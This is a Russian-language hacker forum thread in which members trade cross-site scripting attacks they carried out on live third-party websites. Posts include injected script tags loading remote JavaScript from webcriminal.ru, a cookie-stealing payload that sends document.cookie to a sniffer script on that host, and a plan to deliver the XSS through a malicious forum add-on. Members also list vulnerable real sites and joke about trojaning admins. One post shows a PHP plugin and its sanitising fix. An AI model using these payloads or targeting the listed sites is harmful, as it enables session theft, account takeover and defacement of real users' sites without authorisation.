<script>alert('Межсайтовый нежданчик')</script>

[SrDEN]

Давно хотел создать подобную тему, есть Лента дефейсов, а это будет своего рода лентой XSS-ейсов :)

Бывает такое, что разработчики плохо фильтруют входящие данные, либо вообще этого не делают, а некоторые даже и не все места предугадывают, откуда это может прийти...

В этой теме предлагаю делится подобными проектами, где у вас получилось провести атаку, желательно со скриншотами, а лучше даже видео записать. По сложившейся вебкриминальной традиции, мы любим засовывать harlem-shake

<script src="http://webcriminal.ru/files/hshake.js"></script>

вы тоже можете её продолжить, либо придумать что-то еще.

Приветствуются нестандартные атаки!

Начинаю. Сервис укорачиватель ссылок от xakeroker.ws -> xkrk.cf
На главной уже нету, вот остались примеры:
http://xkrk.cf/hello
http://xkrk.cf/h4x

Ну и собственно видео:

В данном случае, входящие данные вообще не фильтровались, все что отсылалось, появлялось на главной.

 

[X-Oleg]

Прикольно !

 

[ddd]

Вот еще oip.cc, как-то у нас на форуме проскакивал:

Но тут только себя повеселишь, т.к. как кроме как видео или скриншота не показать, зато входящие данные из неожиданного места :)

 

[SrDEN]

Еще одна XSS-отека у xakeroker в этот раз на paste.xakeroker.in

Итог, не проверяют ребята скрипты перед установкой...
P.S. там у них еще есть, но больше лезть не буду :)

 

[X-Oleg]

Итог, не проверяют ребята скрипты перед установкой...

Да это паблик скрипты, которые сделаны "На коленках", у меня есть архив по мойму из 100 скриптов: Там всякие файлообменники, парсинг музыки из Вконтакте и т.д.

Было время хотел файлообменник сделать, глянул, та-же хрень с XSS в этоге удалил...

А так эти XSS могут-быть достаточно опасными, можно протроянить админов, ну или вставить туда рекламу и иметь профит с их сервисов, гы-гы...

 

[ddd]

А так эти XSS могут-быть достаточно опасными, можно протроянить админов, ну или вставить туда рекламу и иметь профит с их сервисов, гы-гы...

Конечно, еслиб вместо алертов и дискотеки вставили код позловещей, то это все провисело на много дольше и успело скомпрометировать всё и вся :)

 

[X-Oleg]

Хе, как-то писал плагин Доната для XenForo, и вот что получилось, смотрим ролик:

Вот вопрос, а насколько это опасно в моём случае ? Т.е. нужно-ли выпускать секюрити фикс ?

Ведь проэксплуатировать это практически нереально, данные берутся тоько после нажатия на кнопку "Оплатить" Post-запросом !

Кстати фиксится легко, если был такой код:

if (isset($_POST['mytext']))
{
    $Pay_Interkassa=$_POST['mytext']; //Получаем сколько нужно оплатить из формы доната...
}
else
{
    echo 'Dont Worked ! :)';
    exit();
};

Как видите $Pay_Interkassa никак не экранируется, фиксим при помощи filter_var($Pay_InterkassaGet,FILTER_SANITIZE_NUMBER_FLOAT)...

FILTER_SANITIZE_NUMBER_FLOAT - Это и есть фильтр в пхп, т.е. нам-же нужны только числа, тупо всё порежит...

Правленный код:

if (isset($_POST['mytext']))
{
    $Pay_InterkassaGet=$_POST['mytext']; //Получаем сколько нужно оплатить из формы доната...
   
    $Pay_Interkassa=filter_var($Pay_InterkassaGet,FILTER_SANITIZE_NUMBER_FLOAT); //Экранируем, чтобы не было XSS
}
else
{
    echo 'Dont Worked ! :)';
    exit();
};

Вопрос, реально-ли проэксплуатировать такую XSS и как ?

 

[ddd]

Вопрос, реально-ли проэксплуатировать такую XSS и как ?

Конечно реально, если на сайте есть известная вам XSS, то её надо сразу же исправлять, если не знаете как, то отключать.

Данную уязвимость можно поэксплуатировать с далека. Допустим написать пользовательский скрипт допустим для greasemonkey(хотя в нашем случае это не то)лучше дополнение для форума, которое будет какой-то наворот добавлять, люди поставят(сперва правда проверят), через пару дополнений пихаем код, который после нажатия кнопки Пожертвовать, добавляет в val инпута код:

<script>document.location.replace('http://webcriminal.ru/snifer.php?nyama='+document.cookie)</script>

Пользователь даже нечего и не заметит, а наш снифер получит его куки.
Сценарий конечно на грани фантастики, но имеет место быть.

P.S. многие недооценивают опасность XSS... в общем была бы дырка, а как её проэксплуатировать мы найдем :)

P.S2. скрипт можно вставить не в таком явном виде

 

[ddd]

@X-Oleg нашел ваш плагин, вернул XSS и развернул всё это дело на локалке. Далее воспроизвел на видео как это могло все произойти. В роли обезьянки\единорогского дополнения, будет выступать простой редактор JS. Думаю все наглядно :)

СИ + минимальные навыки программирования = гремучая смесь :)

 

[X-Oleg]

Вернёмся к хакрокерам, уязвимость на форуме теперь:

 

[ddd]

@X-Oleg интересно там активная xss? Если тему создать с таким тегом, то прыгала бы главная для всех пользователей :)

P.S. наверное уже исправили, так как эту тему скорее всего хакерокеры уже мониторят :)
P.S2. надо подобный плагин на локалке поставить и потестить, да и вообще глянуть популярные плагины для ксении, из-за простоты движка, их пишут все кому не лень, и скорее всего про фильтрацию, большинство плагинописателей не чего не слышали :)

 

[Rufus]

В последней версии ксентага-баг пофикшен.
А всё началось отсюда:https://bhf.su/threads/150267/

 

[X-Oleg]

Да именно от туда и узнал, уязвимость очень неприятная, вот что можно-было сделать, если-бы я был злодеем:

1. Редактирование профилей;

2.Создание тем от имени пользователя;

3.Можно даже попробовать было прочитать ЛС при помощи этого лага...

Ещё немножко добавлю про куки, кроме httpOnly, в ксене если не делать "Запомнить меня" идёт привязка к айпишнику, поэтому кража кук ещё может непомочь, правда если стоит галочка "Запомнить меня", тогда-да могут-быть проблемы ! :(

Вот если нужно во вложении два версии этого плагина: Профиксенная и с XSS ! :)

 

[ddd]

@X-Oleg отлично, если на выходных будет плохая погода, то проверю свою теорию + попробую устроить атаку еще на один популярный плагин :)

 

[ddd]

Посты о хакерокерах перенесу сюда, чтоб в этой теме оффтоп не разводить.

Ну и Апну тему XSS-кой в Spam Art table text generator-е

Натолкнулся на него случайно, и решил от делать нечего написать новый скрипт, который меняет размеры ячейкам таблицы и на фоне играет 8bit ковер на Prodigy: http://webcriminal.ru/files/table8bit.js

Скрипт писал на коленке, по этому он вряд ли универсальный, возможно потом допилю. На данный момент он находит первую таблицу, оставляет максимум 100 столбцов таблицы, и потом начинает рандом менять размеры ячеек и все это под 8bit :)

P.S. надо будет тему создать, для подобных скриптов. Лет 5-ть назад, обещался @2FED написать статью про красивые дефейсы с помощью js

 

[Rufus]

Хе, как-то писал плагин Доната для XenForo, и вот что получилось

Твой не фикшенный аддон по душе ребятам.И главное,что каждый день у нас сидят,но в упор не видят твоей обновы.
http://over-code.ru/
и в магазинчике тоже xss гуляет
http://bill.shopsu.ru/reg.php

Спойлер

 

[Rufus]

На одном форуме,обнаружилась вот такая подборка.В xentag и в донате от Кесаева.

Админ этого форума-старый ксеновод,поэтому я предупредил его о возможных неприятностях)
Кстати с донатом имеются проблемы и здесь:
https://delhack.net/

 

[ddd]

Админ этого форума-старый ксеновод,поэтому я предупредил его о возможных неприятностях)

Надо было веселей его предупредить :) дал бы ссылку на xss, чтоб он сообщение от своего имени написал, под шарлем шейк, ну или другую мелодию :)

 

[Rufus]

дал бы ссылку на xss, чтоб он сообщение от своего имени написал, под шарлем шейк

Толком проэксплуатировать эту хрень,я увы не смог из-за отсутствия опыта.Повозился с составлением запроса,но в итоге облом.

 

[Rufus]

Админ этого форума-старый ксеновод,поэтому я предупредил его о возможных неприятностях)

Админ оказался нестандартным)Вместо того,чтобы закрывать дыры,он их понёс к соседям..
http://chitachok.ru/threads/vazhno.35238/
https://bhf.su/threads/162944/